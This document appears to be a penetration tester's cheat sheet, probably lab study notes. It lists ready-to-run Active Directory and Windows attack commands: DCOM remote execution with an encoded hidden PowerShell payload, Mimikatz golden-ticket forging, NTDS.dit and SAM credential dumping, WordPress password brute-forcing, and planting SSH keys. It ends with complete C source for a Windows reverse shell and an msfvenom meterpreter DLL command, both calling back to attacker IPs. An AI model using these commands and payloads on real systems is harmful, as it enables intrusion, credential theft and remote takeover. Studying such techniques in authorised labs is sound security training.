DCOM

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwA...","7")

AD Persistence — Golden Ticket

privilege::debug
lsadump::lsa /patch       # get krbtgt hash
kerberos::purge           # clear existing tickets
kerberos::golden /user:jen /domain:corp.com \
  /sid:S-1-5-21-... /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
misc::cmd                 # launch cmd with golden ticket

AD Persistence — Shadow Copies

vshadow.exe -nw -p C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak
reg.exe save hklm\system c:\system.bak
# Transfer to Kali:
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

Miscellaneous

Note-taking structure during a pentest

creds.txt  /  usernames.txt  /  passwords.txt  /  computers.txt

host1/
  ├── port.nmap
  ├── hash1
  └── hash2
host2/
  ├── port.nmap
  └── hash1

WordPress

wpscan --url http://target --enumerate p --plugins-detection aggressive -o wpscan.txt
wpscan --url http://target --passwords passwords.txt
# -e at -e ap -e u  → all themes, plugins, users

Git secrets

git log
git show [commit-id]   # inspect specific commit for creds

Monitor processes (Linux)

# pspy64 — monitor without root:
./pspy64

Extract SAM / SYSTEM

# From C:\Windows.old\Windows\System32
impacket-secretsdump -sam SAM -system SYSTEM local

Generate SSH Key Pairs

ssh-keygen -t ed25519
ssh-keygen -t rsa -b 4096
# Add public key to ~/.ssh/authorized_keys on target

Compile Windows Reverse Shell (C)

#include <winsock2.h>
#include <windows.h>
#define CLIENT_IP (char*)"192.168.45.208"
#define CLIENT_PORT (int)5555
 
int main(void) {
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2,2), &wsaData);
    int port = CLIENT_PORT;
    struct sockaddr_in sa;
    SOCKET sockt = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = inet_addr(CLIENT_IP);
    connect(sockt, (struct sockaddr *)&sa, sizeof(sa));
    STARTUPINFO sinfo; memset(&sinfo, 0, sizeof(sinfo));
    sinfo.cb = sizeof(sinfo);
    sinfo.dwFlags = STARTF_USESTDHANDLES;
    sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)sockt;
    PROCESS_INFORMATION pinfo;
    CreateProcessA(NULL,"cmd",NULL,NULL,TRUE,CREATE_NO_WINDOW,NULL,NULL,&sinfo,&pinfo);
    return 0;
}

i686-w64-mingw32-gcc-win32 -std=c99 windows.c -o rsh.exe -lws2_32

Reverse Shell DLL (x64)

msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll \
  LHOST=192.168.45.200 LPORT=443 > reverse.dll

Grant Folder Permissions

icacls "C:\Staging" /grant adrian:(OI)(CI)F /T